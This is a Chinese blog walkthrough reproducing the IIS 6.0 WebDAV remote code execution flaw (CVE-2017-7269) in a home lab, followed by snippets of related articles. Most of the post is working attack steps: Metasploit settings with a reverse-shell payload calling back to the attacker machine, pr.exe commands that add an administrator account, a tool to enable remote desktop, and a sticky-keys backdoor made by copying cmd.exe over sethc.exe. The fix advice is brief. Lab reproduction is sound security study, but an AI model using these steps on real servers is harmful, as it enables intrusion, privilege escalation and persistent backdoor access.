iis6.0远程代码执行(CVE-2017-7269)

最新推荐文章于 2025-06-16 00:01:59 发布
最新推荐文章于 2025-06-16 00:01:59 发布
阅读量1k 收藏 1
点赞数 1
CC 4.0 BY-SA版权
分类专栏: 漏洞复现 渗透测试 文章标签: iis 提权 shift后门利用
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq115399231/article/details/98610235
本文详细介绍了IIS6.0远程代码执行漏洞CVE-2017-7269的利用过程,包括环境搭建、EXP利用、提权操作以及后续的3389服务开启。同时,提供了修复该漏洞的方法,如关闭WebDAV服务和升级系统。

iis6.0远程代码执行(CVE-2017-7269)

Windows Server 2003的IIS6.0的WebDAV服务的ScStoragePathFromUrl函数存在缓存区溢出漏洞
修复:
关闭IIS 下的WebDAV服务
2015年7月15日,微软已停止对Windows Server 2003的支持,所以官方没有相关解决方案,建议用户升级到最新系统 Windows Server 2016。

环境搭建

使用windows server 2003 R2
在这里插入图片描述
下载安装iis,这里我没有挂载光盘,网上下的iis安装包(已经安装好了,放个图)
在这里插入图片描述
这里我加了个默认页面
在这里插入图片描述
配置iis服务
在这里插入图片描述
测试环境准备就绪
window server 2003(靶机):192.168.162.132
kali(攻击机):192.168.162.128

EXP利用

下载
把exp 复制到kali攻击机器的/usr/share/metasploit-framework/modules/exploits/windows/iis目录下
打开Metasploit,使用我们刚才下载的exp
在这里插入图片描述
设置

msf exploit(windows/iis/cve-2017-7269) > set RHOST 192.168.162.132 #目标机ip
RHOST => 192.168.162.132
msf exploit(windows/iis/cve-2017-7269) > set HttpHost 192.168.162.132 #目标网站
HttpHost => 192.168.162.132
msf exploit(windows/iis/cve-2017-7269) > set payload windows/meterpreter/reverse_tcp #返回荷载
payload => windows/meterpreter/reverse_tcp
msf exploit(windows/iis/cve-2017-7269) > set LHOST 192.168.162.128 #攻击机IP
LHOST => 192.168.162.128
msf exploit(windows/iis/cve-2017-7269) >

在这里插入图片描述
攻击后返回meterpreter附:相关命令

提权

当前权限:
在这里插入图片描述
无法执行添加用户等命令
尝试上传asp木马到wwwroot目录(权限不足)
在这里插入图片描述
思考其他方法
尝试窃取管理员身份验证
meterpreter使用ps命令查看目标主机进程
未发现发现存在以system运行的进程,尴尬了
发现部分目录可以上传,上传pr.exe提权工具
在这里插入图片描述
使用pr.exe执行命令
在这里插入图片描述
在添加用户时遇到问题,最后找到原因是win2003密码策略的原因,解决方案
解决后添加administrators用户

pr.exe "net user test123 test123 /add"
pr.exe "net localgroup administrators test123 /add"

在这里插入图片描述
netstat -an查看当前开放端口及服务(未拿到shell的话nmap扫也可以)
在这里插入图片描述
当前机器未开放3389远程桌面服务
上传3389开启工具
在这里插入图片描述
执行
在这里插入图片描述
netstat -an查看,成功开启
在这里插入图片描述
这时我们就可以用我们创建的test123用户远程连接到这台服务器上了

预留shift后门

sethc.exe存在于
c:\windows\system32\sethc.exe或c:\windows\system32\dllcache\sethc.exe
根据当前win2003环境sethc.exe存在的路径
copy c:\windows\system32\cmd.exe c:\windows\system32\dllcache\sethc.exe
这里我就简单的使用cmd.exe替换sethc.exe,有空的话自己写一个启动方式
在这里插入图片描述
在这里插入图片描述
这个后门返回的shell权限还是system,尝试nt authority\network service修改sethc.exe,竟然也成功了,所以当目标主机开启了3389,直接用shift后门体全部就可以。

入侵总结及修复处理

iis6.0远程代码执行的修复

shift后门的防御手段

参考文章:
https://blog.youkuaiyun.com/darkhq/article/details/79127820

复现CVE-2017-7269(IIS6.0远程代码执行)漏洞
记录并分享学习安全的知识点..
03-03 2126
前言: 今天小编挖到了一个高危漏洞,打进去以后,给的用户限太低了,尝试了好久的。虽然最后没成功,起码也攻进去了,也是可看见系统盘所有目录下所有的关键资料,整理报告完成了也索性就记录一下趴! 警告 请勿使用本文到的内容违反法律。 本文不供任何担保。 一、漏洞介绍 Windows Server 2003R2版本IIS6.0的WebDAV服务中的ScStoragePathFromUrl函数存在缓存区溢出漏洞,远程攻击者通过以“If: <http://”开头的长header PRO
iis6.0远程代码执行漏洞复现
shatianyzg的博客
06-12 658
iis6.0远程代码执行漏洞复现(CVE-2017-7269) 实验环境搭建 1.目标机:windows server 2003 r2 需要目标服务器开启WebDAV 靶机IP:192.168.75.134 Kali IP : 192.168.75.129 kali中启动Msf,使用CVE-2017-7269攻击插件 use exploit/windows/iis/cve_2017_7269 没有这个插件的老铁,还麻烦您 在https://github.com/zcgonvh/cve-2017-7269
IIS 6.0 远程代码执行漏洞复现(cve-2017-7269
weixin_48474855的博客
12-20 2073
IIS 6.0 远程代码执行漏洞复现(cve-2017-7269) 靶机(server2003)上的配置: 点击添加/删除windows组件 找到应用程序服务器,点开 选中IIS信息服务器 确定,然后就安装了 安装完成之后 在管理工具里面就有IIS管理器了,打开 在这里插入图片描述 开启WebDAV WebDAV (Web-based Distributed Authoring and Versioning) 一种基于 HTTP 1.1协议的通信协议。它扩展了HTTP 1.1,在GET、POST、
漏洞复现:CVE-2015-1635、CVE-2017-0144
最新发布
2301_77091612的博客
06-16 960
【漏洞分析】CVE-2015-1635(HTTP.sys)和CVE-2017-0144(永恒之蓝)是影响Windows系统的两个高危漏洞。HTTP.sys漏洞可通过特制HTTP请求导致系统崩溃或RCE,影响Win2008R2等系统;MS17-010则通过SMBv1协议实现远程代码执行。实验环境搭建未打补丁的Win2008R2+IIS服务,使用Kali进行渗透测试,成功验证漏洞存在性并通过Metasploit获取系统限,最终利用PCShare木马实现持久化控制。关键步骤包括漏洞验证、内存读取、DoS攻击、s
iis6.0远程代码执行漏洞
G208_522的博客
11-20 3587
iis6.0远程代码执行漏洞 1、实验环境搭建 目标主机Windows server2003 sp2 2、目标服务器需要在IIS里面开启WebDAV 3、靶机IP:192.168.149.136(需要改成自己虚拟机win2003的地址) Kali IP : 192.168.149.150(需要改成自己虚拟机kali的地址) 4、打开kali并且 把exp 复制到kali的/usr/share/metasploit-framework/modules/exploits/windows/iis目录下: k
Microsoft IIS远程代码执行漏洞(CVE-2015-1635)复现
qll71的博客
08-12 1401
内网渗漏 漏洞复现示:以下是本篇文章正文内容,下面案例可供参考。
IIS 6.0 WebDAV远程代码执行(CVE-2017-7269) 含POC与修复方法
Anprou的博客
03-28 5668
2015年7月15日,微软已停止对Windows Server 2003的支持,所以官方没有相关解决方案,建议用户升级到最新系统 Windows Server 2016
IIS6.0漏洞之CVE-2017-7269 远程代码执行漏洞复现及Poc验证
7Riven's blog
12-06 4146
漏洞描述 CVE-2017-7269:开启WebDAV服务的IIS 6.0被爆存在缓存区溢出漏洞导致远程代码执行 漏洞产生的原因 在Windows Server 2003的IIS6.0的WebDAV服务的ScStoragePathFromUrl函数存在缓存区溢出漏洞,在IIS 6.0处理 PROPFIND 指令的时候,由于对 url 的长度没有进行有效的长度控制和检查,导致执行memcpy对...
IIS6.0远程代码执行漏洞复现[CVE-2017-7269]
qq_36711588的博客
03-03 638
IIS6.0远程代码执行漏洞复现[CVE-2017-7269]
CVE-2017-7269 IIS6.0远程代码执行漏洞的复现
gp1531620582的博客
06-15 4450
漏洞概况:Windows Server 2003R2版本IIS6.0的WebDAV服务中的ScStoragePathFromUrl函数存在缓存区溢出漏洞,远程攻击者通过以“If: &lt;http://”开头的长header PROPFIND请求,执行任意代码。目前针对 Windows Server 2003 R2 可以稳定利用,该漏洞最早在2016年7,8月份开始在野外被利用。漏洞复现靶机环境:...
IIS6.0远程代码执行漏洞复现(CVE-2017-7269)
万丈⾼楼平地起,勿在浮沙筑⾼台学艺不精的安全菜鸡,改行回家养猪了,对博客有疑问欢迎留言,看到一定回
03-28 1529
文件下载:点此下载 靶机:Windows server 2003 r2 EXP:https://github.com/zcgonvh/cve-2017-7269 把EXP导入Metasploit 启动MSF 尝试加载攻击模块 发现找不到该模块,这是因为msf不识别-,把-改为下划线就好了 重新启动程序 成功加载攻击模块 查看需要设置的参数 设置参数 加载攻击载荷 开始攻击 攻...
IIS 漏洞Http.sys 远程代码执行
qtvb1987的专栏
11-16 799
1.在KB3042553补丁出现前,微软发布声明:今后发布的所有 Windows RT 8.1、Windows 8.1 和 Windows Server 2012 R2 安全更新程序和与安全无关的更新程序都要求安装更新程序 2919355。不适用于您的计算机”的问题,这是因为此补丁依赖于补丁:KB3021910、KB2919355。2.在安装对应补丁的时候,应仔细看微软官网给出的补丁对机器的影响。Microsoft 通过协同的漏洞披露渠道了解到此漏洞的信息。请求的方式,安装更新可以修复此漏洞。
http.sys远程代码执行漏洞(MS15-034)
weixin_34307464的博客
08-06 903
0x01漏洞描述 远程执行代码漏洞存在于 HTTP 协议堆栈 (HTTP.sys) 中,当 HTTP.sys 未正确分析经特殊设计的 HTTP 请求时会导致此漏洞。成功利用此漏洞的攻击者可以在系统帐户的上下文中执行任意代码。若要利用此漏洞,攻击者必须将经特殊设计的 HTTP 请求发送到受影响的系统。 通过修改 Windows HTTP 堆栈处理请求的方式,安装更新可以修复此漏洞。 0x0...
iis mvc3 所有请求都指向一个_IIS远程代码执行漏洞(CVE20151635)
weixin_39688636的博客
01-13 223
漏洞成因IIS远程代码执行漏洞存在于HTTP协议堆栈(HTTP.sys)中,当HTTP.sys不正确地解析HTTP请求时会导致此漏洞。安装了微软IIS 6.0以上的Windows Server 2008 R2/Server 2012/Server2012 R2和Windows 7/8/8.1都受到这个漏洞的影响。微软公告:https://docs.microsoft.com/en-us/...
bat 远程复制文件_iis6.0远程代码执行漏洞复现(CVE20177269)
weixin_30800615的博客
11-25 432
.实验环境搭建1.目标机:windows server 2003 r22.iis配置目标机ip:192.168.0.102二.攻击机器一台kai liunx ip:192.168.0.131三.开始攻击下载攻击exp,地址:exp:https://github.com/zcgonvh/cve-2017-72691.把exp 复制到攻击机器的/usr/share/metasplo...
IIS6.0远程命令执行漏洞(CVE-2017-7269)
weixin_30345055的博客
03-30 189
poc: https://github.com/dmchell/metasploit-framework/pull/1/commits/9e8ec532a260b1a3f03abd09efcc44c30e4491c2 require 'msf/core' class MetasploitModule < Msf::Exploit::Remote Rank = Goo...
IIS_CVE-2017-7269 IIS6.0远程代码执行漏洞复现
WY92139010的博客
05-20 500
CVE-2017-7269 IIS6.0远程代码执行漏洞复现 一、漏洞描述 IIS 6.0默认不开启WebDAV,一旦开启了WebDAV,安装了IIS6.0的服务器将可能受到该漏洞的威胁。 二、影响版本以及利用条件 Windows 2003 R2开启WebDAV服务的IIS6.0 三、漏洞环境搭建 Windows server 2003 R2 安装IIS服务,并且开启了W...
iis怎么创建文件选择上传窗口_IIS-远程代码执行漏洞
weixin_39624733的博客
11-21 290
大家好我是阿远,这篇文章我给大家详细的了解IIS远程代码执行漏洞漏洞说明开启WebDAV服务的IIS 6.0被爆存在缓存区溢出漏洞导致远程代码执行,目前针对Windows Server 2003 R2可以稳定利用,该漏洞最早在2016年7,8月份开始在野外被利用。影响产品:Microsoft Windows Server 2003 R2 开启WebDAV服务的IIS6.0(目前已验证,其他版本尚未...
IIS6远程执行漏洞复现
weixin_53696027的博客
03-01 642
通过自己搭建靶场复现IIS远程命令执行漏洞
IIS6.0 CVE-2017-7269漏洞:远程利用与本地详解
IIS6.0版本在2017年被发现存在一个名为CVE-2017-7269的安全漏洞,该漏洞允许攻击者通过WebDAV服务执行远程代码,从而对系统造成危害。 WebDAV (Web-based Distributed Authoring and Versioning) 是一种扩展HTTP...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值